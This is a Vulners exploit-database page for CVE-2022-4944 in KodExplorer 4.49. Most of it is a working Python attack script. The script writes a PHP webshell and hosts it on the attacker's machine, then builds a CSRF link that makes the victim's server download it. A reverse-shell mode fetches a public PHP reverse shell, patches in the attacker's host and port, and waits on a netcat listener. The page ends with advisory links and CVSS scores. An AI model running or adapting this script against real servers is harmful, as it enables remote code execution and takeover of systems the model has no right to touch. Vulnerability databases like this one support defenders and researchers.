Vulners
Lucene search
KodExplorer 4.49 - CSRF to Arbitrary File Upload
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | KodExplorer 4.49 - CSRF to Arbitrary File Upload Exploit | 25 Apr 202300:00 | – | zdt |
 | Exploit for Cross-Site Request Forgery (CSRF) in Kodcloud Kodexplorer | 21 Apr 202315:09 | – | githubexploit |
| Exploit for Cross-Site Request Forgery (CSRF) in Kodcloud Kodexplorer | 21 Apr 202315:09 | – | githubexploit |
 | KodExplorer 跨站请求伪造漏洞 | 22 Apr 202300:00 | – | cnnvd |
 | KodExplorer Cross-Site Request Forgery Vulnerability | 24 Apr 202300:00 | – | cnvd |
 | CVE-2022-4944 | 22 Apr 202318:00 | – | cve |
 | CVE-2022-4944 kalcaddle KodExplorer cross-site request forgery | 22 Apr 202318:00 | – | cvelist |
 | EUVD-2022-52197 | 3 Oct 202520:07 | – | euvd |
 | CVE-2022-4944 | 22 Apr 202318:15 | – | nvd |
 | KODExplorer 4.49 Cross Site Request Forgery / Shell Upload | 21 Apr 202300:00 | – | packetstorm |
10
# Exploit Title: KodExplorer <= 4.49 - CSRF to Arbitrary File Upload
# Date: 21/04/2023
# Exploit Author: MrEmpy
# Software Link: https://github.com/kalcaddle/KodExplorer
# Version: <= 4.49
# Tested on: Linux
# CVE ID: CVE-2022-4944
# References:
# * https://vuldb.com/?id.227000
# * https://www.cve.org/CVERecord?id=CVE-2022-4944
# * https://github.com/MrEmpy/CVE-2022-4944
import argparse
import http.server
import socketserver
import os
import threading
import requests
from time import sleep
def banner():
print('''
_ _____________ _____ _ ______ _____
_____
| | / / _ | _ \ ___| | | | ___ \/ __ \|
___|
| |/ /| | | | | | | |____ ___ __ | | ___ _ __ ___ _ __ | |_/ /| / \/|
|__
| \| | | | | | | __\ \/ / '_ \| |/ _ \| '__/ _ \ '__| | / | | |
__|
| |\ \ \_/ / |/ /| |___> <| |_) | | (_) | | | __/ | | |\ \ | \__/\|
|___
\_| \_/\___/|___/ \____/_/\_\ .__/|_|\___/|_| \___|_| \_| \_|
\____/\____/
| |
|_|
[KODExplorer <= v4.49 Remote Code Executon]
[Coded by MrEmpy]
''')
def httpd():
port = 8080
httpddir = os.path.join(os.path.dirname(__file__), 'http')
os.chdir(httpddir)
Handler = http.server.SimpleHTTPRequestHandler
httpd = socketserver.TCPServer(('', port), Handler)
print('[+] HTTP Server started')
httpd.serve_forever()
def webshell(url, lhost):
payload = '<pre><?php system($_GET["cmd"])?></pre>'
path = '/data/User/admin/home/'
targetpath = input('[*] Target KODExplorer path (ex /var/www/html): ')
wshell_f = open('http/shell.php', 'w')
wshell_f.write(payload)
wshell_f.close()
print('[*] Opening HTTPd port')
th = threading.Thread(target=httpd)
th.start()
print(f'[+] Send this URI to your target:
{url}/index.php?explorer/serverDownload&type=download&savePath={targetpath}/data/User/admin/home/&url=http://
{lhost}:8080/shell.php&uuid=&time=')
print(f'[+] After the victim opens the URI, his shell will be hosted at
{url}/data/User/admin/home/shell.php?cmd=whoami')
def reverseshell(url, lhost):
rvpayload = '
https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
'
path = '/data/User/admin/home/'
targetpath = input('[*] Target KODExplorer path (ex /var/www/html): ')
lport = input('[*] Your local port: ')
reqpayload = requests.get(rvpayload).text
reqpayload = reqpayload.replace('127.0.0.1', lhost)
reqpayload = reqpayload.replace('1234', lport)
wshell_f = open('http/shell.php', 'w')
wshell_f.write(reqpayload)
wshell_f.close()
print('[*] Opening HTTPd port')
th = threading.Thread(target=httpd)
th.start()
print(f'[+] Send this URI to your target:
{url}/index.php?explorer/serverDownload&type=download&savePath={targetpath}/data/User/admin/home/&url=http://
{lhost}:8080/shell.php&uuid=&time=')
input(f'[*] Run the command "nc -lnvp {lport}" to receive the
connection and press any key\n')
while True:
hitshell = requests.get(f'{url}/data/User/admin/home/shell.php')
sleep(1)
if not hitshell.status_code == 200:
continue
else:
print('[+] Shell sent and executed!')
break
def main(url, lhost, mode):
banner()
if mode == 'webshell':
webshell(url, lhost)
elif mode == 'reverse':
reverseshell(url, lhost)
else:
print('[-] There is no such mode. Use webshell or reverse')
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-u','--url', action='store', help='target url',
dest='url', required=True)
parser.add_argument('-lh','--local-host', action='store', help='local
host', dest='lhost', required=True)
parser.add_argument('-m','--mode', action='store', help='mode
(webshell, reverse)', dest='mode', required=True)
arguments = parser.parse_args()
main(arguments.url, arguments.lhost, arguments.mode)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Apr 2023 00:00Current
8.8High risk
Vulners AI Score8.8
CVSS 3.14.3 - 8.8
CVSS 25
CVSS 34.3
EPSS0.02622